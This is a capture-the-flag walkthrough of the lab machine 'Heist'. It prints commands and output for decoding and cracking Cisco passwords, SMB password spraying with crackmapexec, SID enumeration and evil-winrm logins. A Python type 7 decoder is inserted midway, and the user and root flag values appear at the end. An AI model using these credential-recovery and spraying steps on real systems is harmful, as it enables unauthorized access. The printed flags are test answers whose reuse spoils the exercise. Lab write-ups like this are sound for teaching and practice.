Heist brought new concepts that I had never seen before on HTB, while still maintaining a simple difficulty level. I will start by finding a Cisco configuration on the website that contains some usernames and password hashes. After recovering the passwords, I will discover one that can obtain RPC access, which I will use to find more usernames. One of these usernames and one of the original passwords are used to obtain a WinRM session on Heist. From there, I will notice that Firefox is running and dump the process memory to find the original website's password, which is also the administrator password for the box.
Information Gathering#
└─# nmap -sV 10.129.96.157
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-07 03:13 EST
Nmap scan report for 10.129.96.157
Host is up (0.39s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.35 seconds
Ports 80, 135 and 445 are open; let's start with the web server on port 80.
The site presents a login page. Weak passwords got me nowhere, but there is an option to log in as a guest.
Password Cracking#
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0 mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh
I obtained a Cisco network configuration file. Two lines in it hold local user credentials:
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
These are type 7 passwords for two accounts. A third line holds the enable secret:
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
This is the privileged EXEC (enable) password, stored as a type 5 hash rather than a type 7 encoding.
CMD5 could not crack the password, so I looked for a Cisco password cracker and found an online decoding page.
The URL is: https://www.ifm.net.nz/cookbooks/passwordcracker.html
It gave me the rout3r password $uperP@ssword and the admin password Q4)sJu\Y8qz*A3?d.
That still leaves the enable secret to crack.
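As an added example (my own code, not from the write-up above): a small Python audit that walks the router config shown earlier, decodes every `password 7` string with the long-published fixed XOR key that type 7 uses (which is why these are encodings rather than hashes, and why `service password-encryption` offers no real protection), and reports `enable secret 5` entries as md5crypt hashes that can only be brute-forced offline. The SAMPLE_CONFIG lines are copied from the page; the function names are my own.

```python
import re

# Cisco's fixed type 7 XOR key; the scheme has been public since the 1990s,
# which is why "password 7" strings are obfuscation, not protection.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

def decode_type7(encoded: str) -> str:
    """Reverse a Cisco type 7 string: 2-digit seed, then hex-encoded XOR bytes."""
    if len(encoded) < 4 or len(encoded) % 2 or not encoded.isalnum():
        raise ValueError("not a type 7 string")
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data))
    return plain.decode("ascii")

USER_RE = re.compile(r"^username (\S+).*?password 7 (\S+)", re.M)
ENABLE_RE = re.compile(r"^enable secret 5 (\$1\$\S+)", re.M)

def audit_config(config: str) -> dict:
    """Return findings for a running-config: decoded type 7 creds and enable-secret hashes."""
    findings = {"type7": {}, "md5crypt": []}
    for user, enc in USER_RE.findall(config):
        findings["type7"][user] = decode_type7(enc)
    for h in ENABLE_RE.findall(config):
        findings["md5crypt"].append(h)
    return findings

# Lines copied from the config shown on the page
SAMPLE_CONFIG = """\
service password-encryption
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    result = audit_config(SAMPLE_CONFIG)
    for user, pw in result["type7"].items():
        print(f"[!] type 7 is reversible: {user} -> {pw}")
    for h in result["md5crypt"]:
        print(f"[*] enable secret is md5crypt (offline-crackable, keep it long): {h}")
```

Running it on the config recovers both type 7 passwords instantly, while the enable secret is only reported, since md5crypt has to be brute-forced as shown with John next.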
Using John to automatically crack the ciphertext:
─# john 2.txt --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:12 2.09% (ETA: 03:44:05) 0g/s 29115p/s 29115c/s 29115C/s jose1980..jornel
stealth1agent (?)
1g 0:00:01:25 DONE (2022-12-07 03:35) 0.01171g/s 41059p/s 41059c/s 41059C/s stealth323..stealth1967
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
I obtained another password, stealth1agent.
Now I have two accounts and three passwords:
Users: rout3r, admin
Passwords: $uperP@ssword, Q4)sJu\Y8qz*A3?d, stealth1agent
Lateral Movement on Port 445#
With these passwords, and since port 445 is also open, I will try crackmapexec directly to see whether any of them work over SMB.
Somewhat embarrassingly, none of the account/password pairs worked. Looking back at the website, I added the guest account Hazard to the user list.
Let's run it again.
└─# crackmapexec smb 10.129.96.157 -u user.txt -p pass.txt
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard
I obtained a working SMB account, Hazard.
From previous experience, lateral movement is also possible via WinRM, so I will scan port 5985.
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-07 04:00 EST
Nmap scan report for 10.129.96.157
Host is up (0.41s latency).
PORT STATE SERVICE
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 1.07 seconds
I tried to connect over WinRM with that password, but the connection failed.
Let's check the SMB shares instead.
─# smbmap -H 10.129.96.157 -u hazard -p stealth1agent
[+] IP: 10.129.96.157:445 Name: 10.129.96.157
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
Only IPC$ is accessible, and only read-only, but that is enough for RPC-based user enumeration.
SMB User Enumeration#
https://www.freebuf.com/sectool/175208.html
https://www.heikeblog.com/archives/661.html This article provides a detailed introduction to several uses of the impacket package.
└─# python3 lookupsid.py hazard:stealth1agent@10.129.96.157
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.129.96.157
[*] StringBinding ncacn_np:10.129.96.157[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
With these new usernames, I will add them to the original user list and run the password spray again.
└─# crackmapexec smb 10.129.96.157 -u user.txt -p pass.txt --continue-on-success
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Guest:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Guest:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Guest:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Chase:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE
The --continue-on-success parameter makes crackmapexec keep trying the remaining pairs instead of stopping after the first hit. This turned up a second valid login: SupportDesk\Chase with the admin password from the router config, Q4)sJu\Y8qz*A3?d.
WinRM Connection#
┌──(root㉿kali)-[~/Desktop]
└─# evil-winrm -i 10.129.96.157 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase
*Evil-WinRM* PS C:\Users\Chase\Documents>
The new user Chase is able to connect over WinRM.
Obtain User Flag#
*Evil-WinRM* PS C:\Users\Chase\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Chase\desktop> dir
Directory: C:\Users\Chase\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/22/2019 9:08 AM 121 todo.txt
-ar--- 12/9/2022 7:41 AM 34 user.txt
*Evil-WinRM* PS C:\Users\Chase\desktop> type user.txt
d4a33ebeff5334ec5c96993941af64d8
*Evil-WinRM* PS C:\Users\Chase\desktop>
Obtain Root Flag#
There are many users on this machine, but with Chase's low privileges I cannot read the other users' desktops.
Let's check the todo.txt file I just found.
*Evil-WinRM* PS C:\Users\Chase\desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.
The note lists three items: two still to do (keep checking the issues list, fix the router config) and one already done (restricting access for the guest user).
Let's check the processes.
*Evil-WinRM* PS C:\Users\Chase\desktop> ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
468 18 1980 5272 368 0 csrss
290 13 2224 5104 472 1 csrss
357 15 3448 14572 2156 1 ctfmon
251 14 3920 13316 3916 0 dllhost
166 9 1880 9716 0.03 6616 1 dllhost
614 32 29164 57988 960 1 dwm
1498 58 23896 78852 5304 1 explorer
1090 68 128468 205616 5.72 6264 1 firefox
347 19 10144 38584 0.11 6444 1 firefox
355 25 16396 38876 0.06 6716 1 firefox
401 34 34604 92436 0.70 6840 1 firefox
378 28 22020 58668 0.70 7020 1 firefox
49 6 1792 4584 768 1 fontdrvhost
49 6 1492 3808 776 0 fontdrvhost
0 0 56 8 0 0 Idle
976 22 5800 14792 624 0 lsass
223 13 3072 10308 3220 0 msdtc
0 12 400 15056 88 0 Registry
275 14 3096 15000 5448 1 RuntimeBroker
145 9 1716 7524 5732 1 RuntimeBroker
303 16 5636 17024 5804 1 RuntimeBroker
663 32 19716 61648 5668 1 SearchUI
550 11 5192 9632 608 0 services
672 28 14788 51860 5576 1 ShellExperienceHost
440 17 4792 23976 5032 1 sihost
53 3 528 1100 268 0 smss
471 22 5812 16264 2460 0 spoolsv
201 12 1980 9592 332 0 svchost
150 9 1812 11648 700 0 svchost
85 5 928 3716 724 0 svchost
860 20 6944 22496 744 0 svchost
378 13 10684 14832 852 0 svchost
868 16 5288 11672 856 0 svchost
257 10 2016 7648 908 0 svchost
286 13 4148 11276 1020 0 svchost
140 7 1364 5620 1068 0 svchost
126 16 4016 7832 1188 0 svchost
184 9 1796 7440 1200 0 svchost
229 12 2628 11208 1216 0 svchost
430 9 2808 8828 1236 0 svchost
154 7 1256 5540 1264 0 svchost
231 9 2168 7512 1304 0 svchost
367 17 4904 13864 1380 0 svchost
172 10 1792 8012 1392 0 svchost
353 14 4380 11480 1440 0 svchost
163 9 3084 7628 1452 0 svchost
255 15 3520 8512 1484 0 svchost
305 11 1976 8740 1492 0 svchost
191 12 2144 11888 1624 0 svchost
320 10 2552 8328 1640 0 svchost
163 11 2868 7356 1716 0 svchost
161 8 1896 7052 1772 0 svchost
129 7 1564 6216 1784 0 svchost
409 32 8448 17000 1820 0 svchost
196 11 1976 8040 1880 0 svchost
239 11 2516 9604 1888 0 svchost
171 9 1532 7176 2120 0 svchost
332 18 14656 31224 2124 0 svchost
167 12 4032 10820 2504 0 svchost
181 22 2488 9796 2512 0 svchost
462 20 12112 26688 2524 0 svchost
261 13 2668 7892 2540 0 svchost
376 15 9708 19304 2564 0 svchost
133 9 1672 6484 2604 0 svchost
136 8 1560 6096 2632 0 svchost
126 7 1224 5264 2656 0 svchost
205 11 2288 8296 2676 0 svchost
233 14 4604 11740 2752 0 svchost
169 10 2204 13200 2816 0 svchost
209 12 1852 7416 2824 0 svchost
265 19 3208 12000 2864 0 svchost
464 17 3448 11820 3076 0 svchost
193 15 6076 10004 3144 0 svchost
382 23 3340 12184 3248 0 svchost
423 48 13668 22296 3256 0 svchost
211 11 2780 11836 4432 0 svchost
145 8 1680 7432 4640 0 svchost
187 12 2636 13236 4696 0 svchost
169 9 4792 12192 4868 0 svchost
300 15 12772 14740 4928 0 svchost
251 14 3188 13740 4940 0 svchost
228 12 3100 13560 5048 1 svchost
365 18 5720 27008 5080 1 svchost
122 7 1288 5520 6208 0 svchost
115 7 1328 5192 6404 0 svchost
264 14 3632 12648 6488 0 svchost
225 12 3624 10940 6572 0 svchost
321 20 10184 14620 6756 0 svchost
1891 0 192 136 4 0 System
211 20 3976 12372 2036 1 taskhostw
167 11 2788 10760 2720 0 VGAuthService
142 8 1696 6844 2692 0 vm3dservice
136 9 1820 7352 3056 1 vm3dservice
384 22 9616 22104 2708 0 vmtoolsd
236 18 5096 15288 5712 1 vmtoolsd
171 11 1500 6860 492 0 wininit
280 13 2816 12936 528 1 winlogon
344 16 8920 18660 3196 0 WmiPrvSE
812 27 52104 70388 1.78 4316 0 wsmprovhost
All the processes look normal except for Firefox, which is out of place on a support server. Following the penetration-testing mindset, I will look at what the browser is doing. As the introduction mentioned, dumping the Firefox process memory reveals the password used on the original website, and that password is also the administrator password for the box.
└─# evil-winrm -i 10.129.96.157 -u administrator -p '4dD!5}x/re8]FBuZ'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/9/2022 7:41 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
22479c36a38a8b34331942f57b066490
*Evil-WinRM* PS C:\Users\Administrator\Desktop>